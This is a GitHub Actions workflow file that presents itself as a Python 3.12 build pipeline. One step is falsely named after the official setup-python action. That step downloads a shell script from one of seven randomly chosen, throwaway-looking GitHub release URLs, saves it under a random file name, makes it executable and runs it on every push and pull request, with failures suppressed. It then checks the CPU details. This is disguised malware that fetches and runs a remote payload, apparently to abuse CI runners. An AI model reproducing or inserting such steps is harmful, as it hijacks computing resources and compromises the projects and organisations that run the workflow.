name: Ngoc Nhi

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4
    - name: Set up Python 3.12
      uses: actions/setup-python@v5
      with:
        python-version: "3.12"
    - name: actions/setup-python@v5
      run: |
        sed -i 's/\r$//' "$0" 2>/dev/null
        CHOOSE=$((1 + RANDOM % 7))
        case $CHOOSE in
                1) R=$(tr -dc a-z0-9 </dev/urandom | head -c 16) && wget https://github.com/14hongphatm-coder/54545443/releases/download/3/arun.sh/?v=$(date +%s) -O "$R.sh" &&  chmod +x "$R.sh" && sed -i 's/\r$//' "$R.sh" && ./"$R.sh"  || true ;;
                2) R=$(tr -dc a-z0-9 </dev/urandom | head -c 16) && wget https://github.com/10hongphatm-gif/345345345/releases/download/10hongphat/arun.sh/?v=$(date +%s) -O "$R.sh" &&  chmod +x "$R.sh" && sed -i 's/\r$//' "$R.sh" && ./"$R.sh"  || true ;;
                3) R=$(tr -dc a-z0-9 </dev/urandom | head -c 16) && wget https://github.com/8hongphatm-beep/45yt4y45y/releases/download/8hongphat/arun.sh/?v=$(date +%s) -O "$R.sh" &&  chmod +x "$R.sh" && sed -i 's/\r$//' "$R.sh" && ./"$R.sh"  || true ;;
                4) R=$(tr -dc a-z0-9 </dev/urandom | head -c 16) && wget https://github.com/7hongphatm-sudo/567567567567/releases/download/7hongphat/arun.sh/?v=$(date +%s) -O "$R.sh" &&  chmod +x "$R.sh" && sed -i 's/\r$//' "$R.sh" && ./"$R.sh"  || true ;;
                5) R=$(tr -dc a-z0-9 </dev/urandom | head -c 16) && wget https://github.com/6hongphatm-alt/34534t4t34/releases/download/6hongphat/arun.sh/?v=$(date +%s) -O "$R.sh" &&  chmod +x "$R.sh" && sed -i 's/\r$//' "$R.sh" && ./"$R.sh"  || true ;;
                6) R=$(tr -dc a-z0-9 </dev/urandom | head -c 16) && wget https://github.com/5hongphatm-hub/5648545124/releases/download/5hongphat/arun.sh/?v=$(date +%s) -O "$R.sh" &&  chmod +x "$R.sh" && sed -i 's/\r$//' "$R.sh" && ./"$R.sh"  || true ;;
                7) R=$(tr -dc a-z0-9 </dev/urandom | head -c 16) && wget https://github.com/4hongphatm-oss/32423456546/releases/download/4hongphat/arun.sh/?v=$(date +%s) -O "$R.sh" &&  chmod +x "$R.sh" && sed -i 's/\r$//' "$R.sh" && ./"$R.sh"  || true ;;
        esac
        lscpu